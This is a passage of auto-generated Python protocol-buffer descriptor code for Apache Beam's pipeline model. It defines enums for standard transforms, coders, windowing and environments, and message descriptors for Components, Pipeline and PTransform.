full_name='org.apache.beam.model.pipeline.v1.StandardPTransforms.DeprecatedPrimitives',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='READ', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\026beam:transform:read:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='CREATE_VIEW', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:create_view:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=2347,
serialized_end=2463,
)
_sym_db.RegisterEnumDescriptor(_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES)
_STANDARDPTRANSFORMS_COMPOSITES = _descriptor.EnumDescriptor(
name='Composites',
full_name='org.apache.beam.model.pipeline.v1.StandardPTransforms.Composites',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='COMBINE_PER_KEY', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005!beam:transform:combine_per_key:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_GLOBALLY', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\"beam:transform:combine_globally:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='RESHUFFLE', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:transform:reshuffle:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE_FILES', index=3, number=3,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:write_files:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=2466,
serialized_end=2708,
)
_sym_db.RegisterEnumDescriptor(_STANDARDPTRANSFORMS_COMPOSITES)
_STANDARDPTRANSFORMS_COMBINECOMPONENTS = _descriptor.EnumDescriptor(
name='CombineComponents',
full_name='org.apache.beam.model.pipeline.v1.StandardPTransforms.CombineComponents',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='COMBINE_PGBKCV', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005 beam:transform:combine_pgbkcv:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_MERGE_ACCUMULATORS', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005,beam:transform:combine_merge_accumulators:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_EXTRACT_OUTPUTS', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005)beam:transform:combine_extract_outputs:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_PER_KEY_PRECOMBINE', index=3, number=3,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005,beam:transform:combine_per_key_precombine:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_PER_KEY_MERGE_ACCUMULATORS', index=4, number=4,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\0054beam:transform:combine_per_key_merge_accumulators:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_PER_KEY_EXTRACT_OUTPUTS', index=5, number=5,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\0051beam:transform:combine_per_key_extract_outputs:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_GROUPED_VALUES', index=6, number=6,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005(beam:transform:combine_grouped_values:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=2711,
serialized_end=3306,
)
_sym_db.RegisterEnumDescriptor(_STANDARDPTRANSFORMS_COMBINECOMPONENTS)
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS = _descriptor.EnumDescriptor(
name='SplittableParDoComponents',
full_name='org.apache.beam.model.pipeline.v1.StandardPTransforms.SplittableParDoComponents',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='PAIR_WITH_RESTRICTION', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005+beam:transform:sdf_pair_with_restriction:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='SPLIT_RESTRICTION', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\'beam:transform:sdf_split_restriction:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='PROCESS_KEYED_ELEMENTS', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005,beam:transform:sdf_process_keyed_elements:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='PROCESS_ELEMENTS', index=3, number=3,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005&beam:transform:sdf_process_elements:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=3309,
serialized_end=3632,
)
_sym_db.RegisterEnumDescriptor(_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS)
_STANDARDSIDEINPUTTYPES_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.StandardSideInputTypes.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='ITERABLE', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:side_input:iterable:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='MULTIMAP', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:side_input:multimap:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=3661,
serialized_end=3765,
)
_sym_db.RegisterEnumDescriptor(_STANDARDSIDEINPUTTYPES_ENUM)
_PARAMETER_TYPE_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.Parameter.Type.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WINDOW', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PIPELINE_OPTIONS', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RESTRICTION_TRACKER', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=4866,
serialized_end=4948,
)
_sym_db.RegisterEnumDescriptor(_PARAMETER_TYPE_ENUM)
_ISBOUNDED_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.IsBounded.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNBOUNDED', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BOUNDED', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=5762,
serialized_end=5813,
)
_sym_db.RegisterEnumDescriptor(_ISBOUNDED_ENUM)
_STANDARDCODERS_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.StandardCoders.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='BYTES', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\023beam:coder:bytes:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='KV', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\020beam:coder:kv:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='VARINT', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\024beam:coder:varint:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='ITERABLE', index=3, number=3,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\026beam:coder:iterable:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='TIMER', index=4, number=4,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\023beam:coder:timer:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='INTERVAL_WINDOW', index=5, number=5,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:coder:interval_window:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='LENGTH_PREFIX', index=6, number=6,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:coder:length_prefix:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='GLOBAL_WINDOW', index=7, number=7,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:coder:global_window:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='WINDOWED_VALUE', index=8, number=8,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\034beam:coder:windowed_value:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=7437,
serialized_end=7857,
)
_sym_db.RegisterEnumDescriptor(_STANDARDCODERS_ENUM)
_MERGESTATUS_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.MergeStatus.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NON_MERGING', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NEEDS_MERGE', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ALREADY_MERGED', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=8506,
serialized_end=8583,
)
_sym_db.RegisterEnumDescriptor(_MERGESTATUS_ENUM)
_ACCUMULATIONMODE_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.AccumulationMode.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DISCARDING', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ACCUMULATING', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=8605,
serialized_end=8662,
)
_sym_db.RegisterEnumDescriptor(_ACCUMULATIONMODE_ENUM)
_CLOSINGBEHAVIOR_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.ClosingBehavior.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EMIT_ALWAYS', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EMIT_IF_NONEMPTY', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=8683,
serialized_end=8745,
)
_sym_db.RegisterEnumDescriptor(_CLOSINGBEHAVIOR_ENUM)
_ONTIMEBEHAVIOR_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.OnTimeBehavior.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FIRE_ALWAYS', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FIRE_IF_NONEMPTY', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=8765,
serialized_end=8827,
)
_sym_db.RegisterEnumDescriptor(_ONTIMEBEHAVIOR_ENUM)
_OUTPUTTIME_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.OutputTime.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='END_OF_WINDOW', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LATEST_IN_PANE', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EARLIEST_IN_PANE', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=8843,
serialized_end=8927,
)
_sym_db.RegisterEnumDescriptor(_OUTPUTTIME_ENUM)
_TIMEDOMAIN_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.TimeDomain.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EVENT_TIME', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PROCESSING_TIME', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SYNCHRONIZED_PROCESSING_TIME', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=8943,
serialized_end=9037,
)
_sym_db.RegisterEnumDescriptor(_TIMEDOMAIN_ENUM)
_STANDARDENVIRONMENTS_ENVIRONMENTS = _descriptor.EnumDescriptor(
name='Environments',
full_name='org.apache.beam.model.pipeline.v1.StandardEnvironments.Environments',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='DOCKER', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\022beam:env:docker:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='PROCESS', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\023beam:env:process:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='EXTERNAL', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\024beam:env:external:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=11436,
serialized_end=11570,
)
_sym_db.RegisterEnumDescriptor(_STANDARDENVIRONMENTS_ENVIRONMENTS)
_DISPLAYDATA_TYPE_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.DisplayData.Type.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='STRING', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INTEGER', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FLOAT', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BOOLEAN', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TIMESTAMP', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DURATION', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='JAVA_CLASS', index=7, number=7,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=12374,
serialized_end=12491,
)
_sym_db.RegisterEnumDescriptor(_DISPLAYDATA_TYPE_ENUM)
_BEAMCONSTANTS = _descriptor.Descriptor(
name='BeamConstants',
full_name='org.apache.beam.model.pipeline.v1.BeamConstants',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_BEAMCONSTANTS_CONSTANTS,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=122,
serialized_end=316,
)
_COMPONENTS_TRANSFORMSENTRY = _descriptor.Descriptor(
name='TransformsEntry',
full_name='org.apache.beam.model.pipeline.v1.Components.TransformsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.Components.TransformsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.Components.TransformsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=767,
serialized_end=863,
)
_COMPONENTS_PCOLLECTIONSENTRY = _descriptor.Descriptor(
name='PcollectionsEntry',
full_name='org.apache.beam.model.pipeline.v1.Components.PcollectionsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.Components.PcollectionsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.Components.PcollectionsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=865,
serialized_end=964,
)
_COMPONENTS_WINDOWINGSTRATEGIESENTRY = _descriptor.Descriptor(
name='WindowingStrategiesEntry',
full_name='org.apache.beam.model.pipeline.v1.Components.WindowingStrategiesEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.Components.WindowingStrategiesEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.Components.WindowingStrategiesEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=966,
serialized_end=1078,
)
_COMPONENTS_CODERSENTRY = _descriptor.Descriptor(
name='CodersEntry',
full_name='org.apache.beam.model.pipeline.v1.Components.CodersEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.Components.CodersEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'), | is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.Components.CodersEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1080,
serialized_end=1167,
)
_COMPONENTS_ENVIRONMENTSENTRY = _descriptor.Descriptor(
name='EnvironmentsEntry',
full_name='org.apache.beam.model.pipeline.v1.Components.EnvironmentsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.Components.EnvironmentsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.Components.EnvironmentsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1169,
serialized_end=1268,
)
_COMPONENTS = _descriptor.Descriptor(
name='Components',
full_name='org.apache.beam.model.pipeline.v1.Components',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transforms', full_name='org.apache.beam.model.pipeline.v1.Components.transforms', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pcollections', full_name='org.apache.beam.model.pipeline.v1.Components.pcollections', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='windowing_strategies', full_name='org.apache.beam.model.pipeline.v1.Components.windowing_strategies', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='coders', full_name='org.apache.beam.model.pipeline.v1.Components.coders', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='environments', full_name='org.apache.beam.model.pipeline.v1.Components.environments', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_COMPONENTS_TRANSFORMSENTRY, _COMPONENTS_PCOLLECTIONSENTRY, _COMPONENTS_WINDOWINGSTRATEGIESENTRY, _COMPONENTS_CODERSENTRY, _COMPONENTS_ENVIRONMENTSENTRY, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=319,
serialized_end=1268,
)
_PIPELINE = _descriptor.Descriptor(
name='Pipeline',
full_name='org.apache.beam.model.pipeline.v1.Pipeline',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='components', full_name='org.apache.beam.model.pipeline.v1.Pipeline.components', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='root_transform_ids', full_name='org.apache.beam.model.pipeline.v1.Pipeline.root_transform_ids', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='display_data', full_name='org.apache.beam.model.pipeline.v1.Pipeline.display_data', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1271,
serialized_end=1446,
)
_PTRANSFORM_INPUTSENTRY = _descriptor.Descriptor(
name='InputsEntry',
full_name='org.apache.beam.model.pipeline.v1.PTransform.InputsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.PTransform.InputsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.PTransform.InputsEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1792,
serialized_end=1837,
)
_PTRANSFORM_OUTPUTSENTRY = _descriptor.Descriptor(
name='OutputsEntry',
full_name='org.apache.beam.model.pipeline.v1.PTransform.OutputsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.PTransform.OutputsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.PTransform.OutputsEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1839,
serialized_end=1885,
)
_PTRANSFORM = _descriptor.Descriptor(
name='PTransform',
full_name='org.apache.beam.model.pipeline.v1.PTransform',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='unique_name', full_name='org.apache.beam.model.pipeline.v1.PTransform.unique_name', index=0,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='spec', full_name='org.apache.beam.model.pipeline.v1.PTransform.spec', index=1,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='subtransforms', full_name='org.apache.beam.model.pipeline.v1.PTransform.subtransforms', index=2,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='inputs', full_name='org.apache.beam.model.pipeline.v1.PTransform.inputs', index=3,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='outputs', full_name='org.apache.beam.model.pipeline.v1.PTransform.outputs', index=4,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='display_data', full_name='org.apache.beam.model.pipeline.v1.PTransform.display_data', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_PTRANSFORM_INPUTSENTRY, _PTRANSFORM_OUTPUTSENTRY, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1449,
serialized_end=1885,
)
_STANDARDPTRANSFORMS = _descriptor.Descriptor(
name='StandardPTransforms',
full_name='org.apache.beam.model.pipeline.v1.StandardPTransforms',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_STANDARDPTRANSFORMS_PRIMITIVES,
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES,
_STANDARDPTRANSFORMS_COMPOSITES,
_STANDARDPTRANSFORMS_COMBINECOMPONENTS,
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS,
],
